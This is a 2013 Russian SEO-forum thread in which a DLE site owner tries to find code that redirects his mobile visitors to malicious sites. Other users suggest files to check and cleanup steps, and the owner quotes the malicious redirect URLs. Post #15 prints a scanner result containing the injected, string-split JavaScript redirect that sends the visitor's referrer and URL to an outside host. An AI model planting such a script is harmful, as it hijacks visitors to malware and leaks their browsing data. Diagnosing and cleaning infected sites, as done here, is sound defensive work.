Войти

Войти | Регистрация
Поиск по сайту
Вредоносный код на сайте
Поиск  Правила 
Seo форум » Поисковая оптимизация » Вопросы новичков
Страницы: 1 2 След.
Вредоносный код на сайте, Хорошо было бы устранить :)
#1
19 Апреля 2013 21:53
Всем доброго времени суток! В общем, такая вот проблема. Есть сайт, с января месяца постоянно попадает в категорию подозрительных сайтов, и в поиске Яндекса помечается вот таким вот текстом: "Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Каждый раз, по результатам выборочной проверки, вредоносный код находится на одной и той же странице (самой посещаемой, но не главной).
Поговорил с платоном, он ответил:
Цитата
При посещении сайта с мобильных устройств, наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующие вредоносные ресурсы:
http://up-daters.ru/m.php?id=14316#_screen1,
http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html

Я давным давно убрал подобные партнерки. И знать не могу, откуда взялись редиректы на эти ссылки. Скачал файлы сайта на компьютер, проверил их поиском (искал по ссылкам) ничего не нашел. Кто сталкивался с такой проблемой? Подскажите, где искать вредоносный код? Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Изменено: Vorobey - 19 Апреля 2013 22:01
Фан-cайт группы - «Ляпис Трубецкой»
#2
19 Апреля 2013 22:05
У вас сайт на DLE?
#3
19 Апреля 2013 22:06
motlik, да.
#4
19 Апреля 2013 22:09
Тогда ищите вредоносный код здесь:
/index.php
/engine/data/dbconfig.php
/engine/data/config.php
/engine/init.php
/engine/engine.php
/language/Russian/website.lng
#5
19 Апреля 2013 22:09
Какая версия движка у вас?
#6
19 Апреля 2013 22:10
motlik, спасибо. Сейчас буду искать. Версия 9.4.
#7
19 Апреля 2013 22:18
Была у меня такая зараза, только сайт на вордпресс. Когда заходили с телефона - редирект шел на сайт, предлогающий скачать новую версию браузера. Редирект шел через .htaccessПроблему решил так: закачал на комп полностью все файлы ( у меня было 3 сайта) - проверил антивирусом (Avira). Он нашел заразу и удалил. Поменял .htaccess на нужный с выставлением нужных прав на файл. Просто редактирование .htaccess ничего не давало - через пару минут он заменялся.
#8
19 Апреля 2013 22:26
Цитата
Vorobey пишет:
Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Вот только что до вас лечили сайт в соседней теме. Неужели сложно пройтись по темам, перед созданием своей.
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
#9
19 Апреля 2013 22:42
Тоже такое было, если нужно исправить и выличить пиши в ЛС
#10
19 Апреля 2013 23:13
Думаю вам следует обновить до 9.8 (и не придется искать вредоносный код). А также удалить все аватары пользователей сайта. Шел заливался через gif-аватар скорее всего. Погуглите "массовый взлом сайтов на dle tehApocalypse".
#11
19 Апреля 2013 23:15
Цитата
motlik пишет:
Думаю вам следует обновить до 9.8 (и не придется искать вредоносный код). А также удалить все аватары пользователей сайта. Шел заливался через gif-аватар скорее всего. Погуглите "массовый взлом сайтов на dle tehApocalypse".
чего ? каким образом ? чисто физически это не возможно
#12
20 Апреля 2013 00:10
Ребята, всем спасибо за ответы. Завтра уже, все проверю. И отпишусь.
#13
21 Апреля 2013 16:55
Цитата
Vorobey пишет:
Всем доброго времени суток! В общем, такая вот проблема. Есть сайт, с января месяца постоянно попадает в категорию подозрительных сайтов, и в поиске Яндекса помечается вот таким вот текстом: "Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Каждый раз, по результатам выборочной проверки, вредоносный код находится на одной и той же странице (самой посещаемой, но не главной).
Поговорил с платоном, он ответил:
Цитата
При посещении сайта с мобильных устройств, наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующие вредоносные ресурсы:
http://up-daters.ru/m.php?id=14316#_screen1 (http://\"http://up-daters.ru/m.php?id=14316#_screen1\"),
http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html (http://\"http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html\")

Я давным давно убрал подобные партнерки. И знать не могу, откуда взялись редиректы на эти ссылки. Скачал файлы сайта на компьютер, проверил их поиском (искал по ссылкам) ничего не нашел. Кто сталкивался с такой проблемой? Подскажите, где искать вредоносный код? Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Была такая-же бяка написал на хост всё исправили и извенились! Ответ был извините была ddos атака на хостинг, Я им в ответ что-же вы ляди исправляли целую неделю пока я не заметил? Мы не можем уследить за каждым ресурсом, если бы Вы сообщили нам раньше, мы отреагировали бы сразу!
#14
21 Апреля 2013 21:49
Всем добрый вечер. Решил проверить сайт, как вы писали. В config, dbconfig и .htaccess ничего не нашел. Просканировал ещё раз через Касперского - тоже молчит. Искал по ссылкам через тотал командер - не нашел ничего. В тех файлах, что писал motlik тоже искал, но не нашел. Возможно, пропустил. Подскажите, точнее, что именно нужно искать? И где ещё может сидеть эта зараза? На хостинг пока что не писал. Эту тему - читал, ничего полезного не нашел. Не хочу пока что обновлять движок, так как куча модулей установлено, и я уже и не помню, где и что менял. Искал по тому коду, который ТС из соседней темы нашел, тоже ничег оне нашел. Есть ещё предложения?)
Изменено: Vorobey - 21 Апреля 2013 21:52
#15
21 Апреля 2013 22:48
Просканировал сайт через http://sucuri.net/. Написано:

Код
Anomaly behavior detected (possible malware). 
Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?11&seo"+"ref="+encodeURIComponent(document.referrer)+ "&para"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script><!DOCTYPEhtml PUBLIC "-//W3C//DTD XHTML 1.0 Strict//RU" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

Все это, в http://site.ru/?do=register. Мне это мало о чем сказало, я проверил файл /modules/register.php - ничего не нашел.  Искал так же по всему сайту ссылку dledle.net - тоже не нашел.
 
Страницы: 1 2 След.
Похожие темы:
  09.03.2026 01:25  Хлебные крошки на сайте: сказка из Простоквашино про навигацию в интернете
  01.12.2023 23:56  Совсем нет посетителей на сайте
  23.09.2023 11:44  Правильно ли сделано на сайте?
  22.07.2022 12:19  Как называется сервис по проверке оптимизации на сайте?
  06.05.2022 16:39  Нашел на своем сайте ссылки на порносайты
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
18:43 ПС Baidu захватит мир! надевайте тазики 
18:30 Биржи ссылок в 2026 - реально ли новичку с одним сайтом поднять копейку? 
18:22 adsense в 2026: кто реально выводит копейку через киргизию? 
17:19 Бесплатное расширение для Chrome — проверка ссылок прямо на странице 
17:17 Раскрутка форума 
17:13 Бесплатное получение бэклинков 
15:27 С чего сейчас проще начать? 
19:29 Proxy SOCKS5/HTTP(S) : Резидентские-$1.5/GB | Мобильные-$2/GB | Datacenter-$1/GB | PREMIUM-$4 /GB 
15:05 Mixmasters - Exchange without AML and KYC 
13:11 SpeedyIndex - ускорение индексирования ссылок в Google. 100 ссылок в подарок. 
11:11 Продвижение YouTube видео в топ поиска | Любой тип контента | Гарантия результата 
11:11 Trustpilot Reviews | Подниму рейтинг вашей компании 
11:11 №1 Рассылка / Инвайтинг [TELEGRAM] | Приватный метод 
11:10 Установка|Настройка|Доработка|Наполнение сайтов|Дизайн|3D|Видеомонтаж 
18:49 Чак Норрис ушел - 19 марта 2026, 86 лет, семья подтвердила 
17:05 Огородники 
13:41 8 марта: желаю аптайма 99.9% и e-e-a-t без локов 
13:02 С юмором по жизни! 
05:10 Точные прогнозы на футбол 
16:47 Какой фильм вы любите посмотреть перед сном? 
15:46 молодильные яблоки и живая вода 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.12.2025 (95 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 21.03.2026 (7 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Развитие канала в Яндекс Дзен
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Путь из слесаря в копирайтеры со своей командой
—  Заработок на Рутубе 2025
—  Бизнес на фоне санкций


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050